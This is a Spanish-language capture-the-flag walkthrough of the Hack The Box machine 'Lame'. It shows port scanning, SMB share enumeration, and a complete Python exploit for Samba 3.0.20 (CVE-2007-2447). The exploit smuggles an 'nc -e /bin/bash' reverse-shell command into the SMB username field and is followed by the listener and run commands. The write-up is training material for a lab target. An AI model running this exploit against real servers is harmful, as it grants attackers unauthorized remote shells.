Lame
OS: Linux
Dificultad: Fácil
Puntos: 20
Nmap Scan
ports=$(nmap -p- --min-rate=5000 -T4 10.10.10.3 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.2
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Enumeracion
En la maquina vemos varios puertos abiertos. Enumeramos los puertos SMB (139,445) e identificamos que podemos escribir en uno de los directorios compartidos.
smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
Sin embargo vemos que no contiene nada relevante para nosotros.
smbclient //10.10.10.3/tmp
smb: \> ls
. D 0 Tue Jan 7 01:11:12 2025
.. DR 0 Sat Oct 31 03:33:58 2020
5569.jsvc_up R 0 Mon Jan 6 16:42:26 2025
.ICE-unix DH 0 Mon Jan 6 16:41:21 2025
vmware-root DR 0 Mon Jan 6 16:41:27 2025
.X11-unix DH 0 Mon Jan 6 16:41:49 2025
.X0-lock HR 11 Mon Jan 6 16:41:49 2025
vgauthsvclog.txt.0 R 1600 Mon Jan 6 16:41:20 2025
SMB 3.0.20 - Command Execute (CVE-2007-2447)
Despues de enumerar identificamos que la version de SMB que esta usando el servidor es vulnerable a Command Execute. Utilizamos el siguiente script para explotar el servicio.
Note
Es necesario instalar la libreria pysmb.
pip install pysmb
exploit.py
import sys
from smb.SMBConnection import SMBConnection
if len(sys.argv) != 5:
print("* CVE-2007-2447 | Samba 3.0.20 < 3.0.25rc 'Username' map script' Command Execution *\n")
print("Usage: python3 exploit.py <rhost> <rport> <lhost> <lport>")
print("Example: python3 exploit.py 10.10.10.10 139 127.0.0.1 4444")
sys.exit()
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3]
lport = sys.argv[4]
username = f"/=`nohup nc -e /bin/bash {lhost} {lport}`"
conn = SMBConnection(username=username, password='', my_name='', remote_name='')
try:
print("[...] Sending payload")
conn.connect(rhost, rport, timeout=10)
except Exception as e:
print("[ + ] You should be getting a shell now.")
sys.exit(e)
Ponemos a la escucha nuestro netcat.
nc -lvnp 1234
Ejecutamos el script.
python3 exploit.py 10.10.10.3 139 10.10.14.2 1234
Una vez ejecutado obtendremos nuestra reverse shell y no es necesario escalar privilegios.